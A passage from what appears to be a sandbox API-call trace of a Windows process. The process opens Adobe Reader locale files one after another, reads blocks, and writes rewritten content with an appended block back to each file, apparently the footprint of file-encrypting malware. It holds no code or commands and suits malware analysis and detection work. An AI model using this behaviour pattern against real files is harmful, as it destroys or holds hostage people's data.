lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x2c00 [0077.146] WriteFile (in: hFile=0x1e8, lpBuffer=0x2667868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0077.147] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0077.147] WriteFile (in: hFile=0x1e8, lpBuffer=0x2667868*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0077.147] CloseHandle (hObject=0x1e8) returned 1 [0077.148] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\AdobeCollabSync.SVE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sv_se\\adobecollabsync.sve"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0077.149] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0077.149] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1a00 [0077.149] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0077.150] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0077.150] ReleaseMutex (hMutex=0x168) returned 1 [0077.150] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCollabSync.SVE", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0077.150] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCollabSync.SVE", cchWideChar=19, lpMultiByteStr=0x1f88ba4, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeCollabSync.SVE", lpUsedDefaultChar=0x0) returned 19 [0077.150] ReadFile (in: hFile=0x1e8, lpBuffer=0x1e954d8, nNumberOfBytesToRead=0x1a00, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e954d8*, lpNumberOfBytesRead=0x345f2bc*=0x1a00, lpOverlapped=0x0) returned 1 [0077.452] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0077.452] WriteFile (in: hFile=0x1e8, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x1f88, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x345f2d0*=0x1f88, lpOverlapped=0x0) returned 1 [0077.453] CloseHandle (hObject=0x1e8) returned 1 [0077.453] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\IA32.SVE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sv_se\\ia32.sve"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0078.116] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0078.116] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xe00 [0078.117] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0078.117] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0078.117] ReleaseMutex (hMutex=0x168) returned 1 [0078.117] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IA32.SVE", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0078.117] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IA32.SVE", cchWideChar=8, lpMultiByteStr=0x1f7346c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IA32.SVE", lpUsedDefaultChar=0x0) returned 8 [0078.117] ReadFile (in: hFile=0x1d8, lpBuffer=0x1e968d8, nNumberOfBytesToRead=0xe00, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e968d8*, lpNumberOfBytesRead=0x345f2bc*=0xe00, lpOverlapped=0x0) returned 1 [0078.519] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0078.519] WriteFile (in: hFile=0x1d8, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1388, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x345f2d0*=0x1388, lpOverlapped=0x0) returned 1 [0078.519] CloseHandle (hObject=0x1d8) returned 1 [0078.520] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\SaveAsRTF.SVE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sv_se\\saveasrtf.sve"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0078.520] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0078.520] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x4600 [0078.520] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0078.521] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0078.521] ReleaseMutex (hMutex=0x168) returned 1 [0078.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaveAsRTF.SVE", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0078.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaveAsRTF.SVE", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SaveAsRTF.SVE", lpUsedDefaultChar=0x0) returned 13 [0078.521] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0078.556] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x3600 [0078.556] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0078.681] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x3600 [0078.681] WriteFile (in: hFile=0x1d8, lpBuffer=0x2872fb8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2872fb8*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0078.682] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0078.682] WriteFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0078.682] CloseHandle (hObject=0x1d8) returned 1 [0078.682] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\Accessibility.TUR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\tr_tr\\accessibility.tur"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0078.684] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0078.684] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xa400 [0078.685] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0078.685] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0078.685] ReleaseMutex (hMutex=0x168) returned 1 [0078.685] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Accessibility.TUR", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0078.685] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Accessibility.TUR", cchWideChar=17, lpMultiByteStr=0x1f88b2c, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Accessibility.TUR", lpUsedDefaultChar=0x0) returned 17 [0078.685] ReadFile (in: hFile=0x1d8, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0078.693] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x9400 [0078.693] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0078.694] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x9400 [0078.695] WriteFile (in: hFile=0x1d8, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0078.695] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0078.695] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0078.695] CloseHandle (hObject=0x1d8) returned 1 [0078.696] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\eBook.TUR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\tr_tr\\ebook.tur"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0078.696] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0078.696] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1a00 [0078.696] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0078.697] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0078.697] ReleaseMutex (hMutex=0x168) returned 1 [0078.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eBook.TUR", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0078.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eBook.TUR", cchWideChar=9, lpMultiByteStr=0x1f732cc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eBook.TUR", lpUsedDefaultChar=0x0) returned 9 [0078.697] ReadFile (in: hFile=0x1d8, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1a00, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x345f2bc*=0x1a00, lpOverlapped=0x0) returned 1 [0078.706] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0078.706] WriteFile (in: hFile=0x1d8, lpBuffer=0x2667868*, nNumberOfBytesToWrite=0x1f88, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesWritten=0x345f2d0*=0x1f88, lpOverlapped=0x0) returned 1 [0078.706] CloseHandle (hObject=0x1d8) returned 1 [0078.706] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\ReadOutLoud.TUR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\tr_tr\\readoutloud.tur"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0078.707] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0078.707] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x2800 [0078.707] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0078.707] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0078.707] ReleaseMutex (hMutex=0x168) returned 1 [0078.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadOutLoud.TUR", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0078.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadOutLoud.TUR", cchWideChar=15, lpMultiByteStr=0x1f735ac, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReadOutLoud.TUR", lpUsedDefaultChar=0x0) returned 15 [0078.707] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0078.723] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1800 [0078.723] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0078.738] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1800 [0078.739] WriteFile (in: hFile=0x1d8, lpBuffer=0x28730b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x28730b8*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0078.739] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0078.739] WriteFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0078.739] CloseHandle (hObject=0x1d8) returned 1 [0078.739] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\Updater.TUR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\tr_tr\\updater.tur"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0078.740] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0078.740] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x2a00 [0078.740] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0078.740] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0078.740] ReleaseMutex (hMutex=0x168) returned 1 [0078.740] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Updater.TUR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0078.740] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Updater.TUR", cchWideChar=11, lpMultiByteStr=0x1f7356c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Updater.TUR", lpUsedDefaultChar=0x0) returned 11 [0078.740] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0078.822] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1a00 [0078.822] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0078.870] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1a00 [0078.871] WriteFile (in: hFile=0x1d8, lpBuffer=0x2669998*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2669998*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0078.871] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0078.871] WriteFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0078.871] CloseHandle (hObject=0x1d8) returned 1 [0078.872] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA\\DigSig.UKR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\uk_ua\\digsig.ukr"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0078.873] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0078.873] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1e800 [0078.873] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0078.873] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0078.873] ReleaseMutex (hMutex=0x168) returned 1 [0078.873] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DigSig.UKR", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0078.874] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DigSig.UKR", cchWideChar=10, lpMultiByteStr=0x1f7320c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DigSig.UKR", lpUsedDefaultChar=0x0) returned 10 [0078.874] ReadFile (in: hFile=0x1d8, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0078.903] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1d800 [0078.903] ReadFile (in: hFile=0x1d8, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0078.980] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1d800 [0078.980] WriteFile (in: hFile=0x1d8, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0078.980] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0078.980] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a4048*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a4048*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0078.981] CloseHandle (hObject=0x1d8) returned 1 [0078.981] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA\\PPKLITE.UKR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\uk_ua\\ppklite.ukr"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0078.990] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0078.990] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x7f600 [0078.990] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: 